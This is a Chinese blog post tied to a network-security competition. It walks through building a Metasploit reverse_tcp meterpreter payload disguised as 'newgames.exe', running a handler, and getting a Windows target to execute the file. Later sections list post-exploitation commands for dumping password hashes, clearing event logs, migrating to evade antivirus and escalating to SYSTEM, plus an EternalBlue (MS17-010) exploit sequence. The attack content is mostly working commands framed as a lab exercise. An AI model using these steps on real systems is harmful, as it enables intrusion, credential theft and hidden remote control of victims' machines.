首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >网络安全

网络安全

原创
作者头像
菜菜有点菜
发布2025-08-18 13:09:34
发布2025-08-18 13:09:34
2010
举报
文章被收录于专栏:白菜博客白菜博客

竞赛内容:

重点考核参赛选手网络系统安全策略部署、信息保护、网络安全运维管理的综合实践能力,具体包括:

(1)参赛选手能够在赛项提供的服务器上配置各种协议和服务,实现网络系统的运行,并根据网络业务需求配置各种安全策略,以满足应用需求。

(2)赛选手能够根据大赛提供的赛项要求,实施网络空间安全防护操作。

(3)参赛选手能够根据网络实际运行中面临的安全威胁,确定安全策略并部署实施,防范并制止网络恶意入侵和攻击行为。

(4)参赛选手通过分组混合对抗的形式,能够实时防护自己服务器,抵御外界的攻击,同时能够对目标进行渗透和攻击。

做一个简单的入侵脚本

靶机:windows 2008 或者 windows7  

操作端:bt5

环境要ping的通。

bt5中MSF工具很强大,他可以运行所有与自己兼容的脚本

1.制作一个脚本: cd /pentest/expoits/framework

                            ./msfpayload windows/meterpreter/reverse_tcp LHOST =本地ip   LPORT=33333 X >  /tmp/newgames.exe

2.建立服务器

在命令行输入msfconsole 进入到MSF软件操作界面

                        use exploit/multi/handler                                                        //使用某某某

                        >set PAYLOAD windows/meterpreter/reverse_tcp            //路径

                        >set LHOST 本地IP                                                                    //设置本地ip

                        >set LPORT  33333                

                        >exploit                                                                                     //运行

3.用共享文件将newgames.exe共享给windwos7,在windwos7中运行它,如果你有入侵的技术肯定更好,直接把文件上传到靶机

靶机打开后在bt5中会弹出一个meterpreter窗口

4.在meterpreter窗口中可以输入以下命令操作

下面调一些重要的功能介绍一下: 

1. background:这个命令是将当前的session放到后台运行,可以在msf中继续其他渗透任务;

2. sessions:这个命令需要配合上面的background使用,该命令是将后台的会话打开,进行会话操作。

3. clearev:该命令是用来清除渗透的登录信息的,这个很有用。 

4. hashdump:该命令是一个post模块,需要配合meterpreter使用,这个命令是用来获取目标系统的哈希值的,输入”run post/windows/gather/hashdump”

5. migrate:这个也是一个post模块。可以将meterpreter当前的进程移动到其他指定的进程中,这样做的好处是可以给meterpreter一个相对稳定的运行环境,同时可以很好的躲避杀软。

6. search:这个命令是用来搜索系统中的文件的。 

7. shell:这个命令是返回目标系统的shell命令行,在windows下返回cmd命令行,在unix下返回sh命令行。

meterpreter > getsystem

利用已自漏洞,自动提权为SYSTEM

meterpreter >screenshot

获取目标电脑,屏幕截图

cd:切换目标目录;

cat:读取文件内容;

del:删除文件;

edit:使用vim编辑文件

ls:获取当前目录下的文件;se

mkdir:新建目录;

rmdir:删除目录;

永恒之蓝:

批量扫描器:https://github.com/holmesian/ms17_010_scan

先用扫描器扫描下活动网络的主机,后缀为yes的就是有漏洞

>msfconsole

>search 17_010        //查询漏洞

>use exploit/windows/smb/ms17_010_eternalblue        //进入漏洞模块

>set RHOST  192.168.x.x        //设置目标ip

>exploit        //启动

ms17010(动静很大,目标有可能蓝屏)

解决meterpreter下vnc无法操控的问题

vim /usr/share/metasploit-framework/scripts/meterpreter/vnc.rb 在if (not courtesy)下添加pay.datastore['ViewOnly'] = false

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 竞赛内容:
  • 做一个简单的入侵脚本
  • 解决meterpreter下vnc无法操控的问题
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档